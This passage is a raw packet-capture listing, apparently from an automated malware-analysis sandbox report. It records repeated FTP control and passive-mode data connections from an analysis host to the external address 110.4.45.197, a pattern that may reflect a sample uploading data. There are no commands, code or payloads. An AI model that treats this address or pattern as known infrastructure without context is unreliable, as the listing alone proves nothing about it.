                                                      Oct 29, 2024 02:34:55.808149099 CET5357150028110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:55.808562040 CET5357150028110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:55.808722973 CET5002853571192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:55.843920946 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:56.590528011 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:56.640830994 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:58.569979906 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:58.773391008 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:59.114371061 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:59.114816904 CET5002962212192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:59.120290995 CET6221250029110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:34:59.120364904 CET5002962212192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:59.120409012 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:34:59.125845909 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:00.015770912 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:00.019224882 CET5002962212192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:00.024869919 CET6221250029110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:00.024889946 CET6221250029110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:00.024898052 CET6221250029110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:00.024951935 CET6221250029110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:00.025006056 CET5002962212192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:00.025043011 CET6221250029110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:00.025059938 CET5002962212192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:00.025068045 CET6221250029110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:00.025084019 CET6221250029110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:00.025094032 CET6221250029110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:00.025116920 CET6221250029110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:00.025125980 CET6221250029110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:00.025139093 CET5002962212192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:00.025196075 CET5002962212192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:00.030522108 CET6221250029110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:00.030531883 CET6221250029110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:00.030561924 CET6221250029110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:00.030570984 CET6221250029110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:00.030584097 CET6221250029110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:00.030592918 CET6221250029110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:00.030668974 CET5002962212192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:00.030731916 CET6221250029110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:00.030827045 CET6221250029110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:00.030868053 CET5002962212192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:00.036164999 CET6221250029110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:00.036365986 CET6221250029110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:00.036829948 CET6221250029110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:00.039056063 CET5002962212192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:00.062676907 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:00.771889925 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:00.812669992 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:05.870991945 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:05.876378059 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:06.218086958 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:06.218801022 CET5003063028192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:06.224184036 CET6302850030110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:06.224242926 CET5003063028192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:06.224315882 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:06.229592085 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:07.134396076 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:07.134731054 CET5003063028192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:07.140233040 CET6302850030110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:07.140243053 CET6302850030110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:07.140258074 CET6302850030110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:07.140266895 CET6302850030110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:07.140292883 CET5003063028192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:07.140299082 CET6302850030110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:07.140315056 CET6302850030110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:07.140319109 CET5003063028192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:07.140322924 CET6302850030110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:07.140341043 CET5003063028192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:07.140353918 CET6302850030110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:07.140362024 CET6302850030110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:07.140364885 CET5003063028192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:07.140383959 CET5003063028192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:07.140397072 CET5003063028192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:07.140414953 CET5003063028192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:07.140492916 CET6302850030110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:07.140539885 CET5003063028192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:07.145587921 CET6302850030110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:07.145637035 CET5003063028192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:07.145647049 CET6302850030110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:07.145656109 CET6302850030110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:07.145669937 CET6302850030110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:07.145678997 CET6302850030110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:07.145690918 CET6302850030110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:07.145699024 CET5003063028192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:07.145723104 CET5003063028192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:07.145745039 CET5003063028192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:07.145853043 CET6302850030110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:07.145862103 CET6302850030110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:07.145870924 CET6302850030110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:07.145879030 CET6302850030110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:07.145926952 CET6302850030110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:07.145930052 CET5003063028192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:07.146011114 CET6302850030110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:07.150928020 CET6302850030110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:07.150988102 CET6302850030110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:07.151068926 CET6302850030110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:07.151118994 CET6302850030110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:07.151128054 CET6302850030110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:07.151138067 CET6302850030110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:07.151242971 CET6302850030110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:07.151271105 CET6302850030110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:07.151339054 CET6302850030110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:07.151482105 CET6302850030110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:07.151546001 CET6302850030110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:07.151771069 CET6302850030110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:07.151817083 CET5003063028192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:07.190978050 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:07.916733980 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:07.970987082 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:09.895121098 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:09.900945902 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:09.910979986 CET5002355195192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:10.241976023 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:10.242337942 CET5003152025192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:10.247813940 CET5202550031110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:10.247885942 CET5003152025192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:10.247965097 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:10.253197908 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:11.185020924 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:11.187738895 CET5003152025192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:11.193231106 CET5202550031110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:11.193240881 CET5202550031110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:11.193248987 CET5202550031110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:11.193284035 CET5202550031110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:11.193291903 CET5202550031110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:11.193463087 CET5202550031110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:11.193471909 CET5202550031110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:11.193506002 CET5202550031110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:11.193514109 CET5202550031110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:11.193521976 CET5202550031110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:11.193634033 CET5003152025192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:11.199028969 CET5202550031110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:11.199038982 CET5202550031110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:11.199086905 CET5202550031110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:11.199095011 CET5202550031110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:11.199115992 CET5202550031110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:11.199125051 CET5202550031110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:11.199223995 CET5202550031110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:11.199332952 CET5003152025192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:11.199351072 CET5202550031110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:11.199369907 CET5202550031110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:11.199435949 CET5202550031110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:11.199493885 CET5003152025192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:11.199506044 CET5202550031110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:11.199528933 CET5202550031110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:11.199686050 CET5202550031110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:11.204838037 CET5202550031110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:11.204978943 CET5202550031110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:11.204987049 CET5202550031110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:11.205265045 CET5202550031110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:11.205275059 CET5202550031110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:11.205593109 CET5202550031110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:11.210988998 CET5003152025192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:11.234986067 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:12.002187967 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:12.062717915 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:16.210088015 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:16.215594053 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:16.556471109 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:16.556984901 CET5003250830192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:16.562402964 CET5083050032110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:16.562556028 CET5003250830192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:16.562556028 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:16.567976952 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:17.492052078 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:17.492676020 CET5003250830192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:17.498100996 CET5083050032110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:17.498111963 CET5083050032110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:17.498162985 CET5083050032110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:17.498171091 CET5083050032110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:17.498178959 CET5083050032110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:17.498202085 CET5003250830192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:17.498265982 CET5083050032110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:17.498266935 CET5003250830192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:17.498275995 CET5083050032110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:17.498291969 CET5083050032110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:17.498301029 CET5083050032110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:17.498347998 CET5083050032110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:17.498379946 CET5003250830192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:17.498440981 CET5003250830192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:17.503645897 CET5083050032110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:17.503690958 CET5083050032110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:17.503700018 CET5083050032110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:17.503717899 CET5083050032110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:17.503734112 CET5083050032110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:17.503736019 CET5003250830192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:17.503745079 CET5083050032110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:17.503767014 CET5083050032110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:17.503770113 CET5003250830192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:17.503815889 CET5003250830192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:17.503840923 CET5083050032110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:17.503880978 CET5083050032110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:17.503945112 CET5083050032110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:17.503957033 CET5083050032110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:17.503968000 CET5083050032110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:17.509064913 CET5083050032110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:17.509119987 CET5083050032110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:17.509229898 CET5083050032110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:17.509241104 CET5083050032110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:17.509572983 CET5083050032110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:17.513261080 CET5003250830192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:17.548759937 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:18.294337034 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:18.343971014 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:19.783720970 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:19.789237022 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:20.130256891 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:20.133793116 CET5003351661192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:20.139250040 CET5166150033110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:20.141163111 CET5003351661192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:20.141165018 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:20.146529913 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:21.061619997 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:21.061849117 CET5003351661192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:21.068878889 CET5166150033110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:21.068896055 CET5166150033110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:21.068918943 CET5166150033110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:21.068931103 CET5166150033110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:21.068943024 CET5166150033110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:21.069000959 CET5003351661192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:21.070585966 CET5166150033110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:21.070599079 CET5166150033110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:21.070636034 CET5166150033110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:21.070647955 CET5166150033110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:21.070658922 CET5166150033110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:21.070663929 CET5003351661192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:21.070714951 CET5003351661192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:21.075609922 CET5166150033110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:21.075680971 CET5003351661192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:21.076107025 CET5166150033110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:21.076169968 CET5003351661192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:21.076188087 CET5166150033110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:21.076200962 CET5166150033110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:21.076212883 CET5166150033110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:21.076261997 CET5003351661192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:21.076694012 CET5166150033110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:21.076744080 CET5003351661192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:21.076781988 CET5166150033110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:21.076827049 CET5003351661192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:21.076847076 CET5166150033110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:21.076860905 CET5166150033110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:21.076883078 CET5166150033110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:21.076891899 CET5003351661192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:21.077002048 CET5166150033110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:21.077013969 CET5166150033110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:21.077024937 CET5166150033110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:21.082789898 CET5166150033110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:21.082865953 CET5166150033110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:21.083436966 CET5166150033110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:21.083548069 CET5166150033110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:21.083581924 CET5166150033110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:21.083594084 CET5166150033110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:21.083623886 CET5166150033110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:21.083636045 CET5166150033110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:21.083920002 CET5166150033110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:21.083976984 CET5003351661192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:21.109622002 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:21.846056938 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:21.891133070 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:25.908178091 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:25.914974928 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:26.254410028 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:26.254832983 CET5003454096192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:26.260231018 CET5409650034110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:26.260305882 CET5003454096192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:26.260390043 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:26.265671968 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:27.200771093 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:27.201026917 CET5003454096192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:27.206635952 CET5409650034110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:27.206691027 CET5409650034110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:27.206701994 CET5409650034110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:27.206712008 CET5409650034110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:27.206753969 CET5003454096192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:27.206788063 CET5409650034110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:27.206805944 CET5003454096192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:27.206810951 CET5409650034110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:27.206823111 CET5409650034110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:27.206831932 CET5409650034110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:27.206844091 CET5409650034110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:27.206855059 CET5409650034110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:27.206923008 CET5003454096192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:27.212308884 CET5409650034110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:27.212328911 CET5409650034110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:27.212376118 CET5409650034110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:27.212385893 CET5409650034110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:27.212404013 CET5409650034110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:27.212413073 CET5409650034110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:27.212414980 CET5003454096192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:27.212461948 CET5003454096192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:27.212464094 CET5409650034110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:27.212475061 CET5409650034110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:27.212506056 CET5003454096192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:27.212615013 CET5003454096192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:27.212877035 CET5409650034110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:27.217868090 CET5409650034110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:27.217972994 CET5409650034110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:27.217983007 CET5409650034110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:27.217994928 CET5409650034110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:27.218028069 CET5409650034110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:27.218040943 CET5409650034110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:27.218048096 CET5409650034110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:27.218116045 CET5409650034110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:27.218456984 CET5409650034110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:27.218574047 CET5003454096192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:27.250230074 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:28.020596027 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:28.062735081 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:32.681978941 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:32.687779903 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:33.030200005 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:33.030673981 CET5003553273192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:33.036072016 CET5327350035110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:33.036144018 CET5003553273192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:33.036204100 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:33.041465044 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:33.933451891 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:33.933829069 CET5003553273192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:33.939423084 CET5327350035110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:33.939433098 CET5327350035110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:33.939452887 CET5327350035110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:33.939461946 CET5327350035110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:33.939471960 CET5327350035110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:33.939490080 CET5327350035110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:33.939496994 CET5003553273192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:33.939572096 CET5003553273192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:33.939579010 CET5327350035110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:33.939588070 CET5327350035110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:33.939615011 CET5327350035110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:33.939624071 CET5327350035110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:33.939661026 CET5003553273192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:33.939707041 CET5003553273192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:35:33.944849968 CET5327350035110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:33.944905043 CET5327350035110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:35:33.944915056 CET5327350035110.4.45.197192.168.2.4
